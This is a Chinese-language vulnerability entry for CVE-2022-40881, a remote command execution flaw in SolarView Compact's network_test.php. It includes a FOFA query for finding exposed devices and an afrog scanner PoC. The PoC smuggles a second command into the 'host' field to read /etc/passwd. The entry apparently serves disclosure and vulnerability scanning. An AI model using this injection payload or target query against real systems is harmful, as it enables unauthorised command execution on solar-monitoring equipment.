CVE-2022-40881: SolarView network_test.php 远程命令执行漏洞

日期: 2025-08-01 | 影响软件: SolarView network | POC: 已公开

漏洞描述

SolarView network_test.php 存在远程命令执行漏洞,攻击者通过构造特殊的请求,可以获取服务器权限 fofa: body="SolarView Compact" && title=="Top"

PoC代码[已公开]

id: CVE-2022-40881

info:
  name: SolarView network_test.php 远程命令执行漏洞
  author: zan8in
  severity: critical
  verified: true
  description: |-
    SolarView network_test.php 存在远程命令执行漏洞,攻击者通过构造特殊的请求,可以获取服务器权限
    fofa: body="SolarView Compact" && title=="Top"
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2022-40881
  tags: cve,cve2022
  created: 2023/10/30

rules:
  r0:
    request:
      method: POST
      path: /network_test.php
      body: host=%0acat${IFS}/etc/passwd%0a&command=ping
    expression: '"root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)'
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2022/CVE-2022-40881.yaml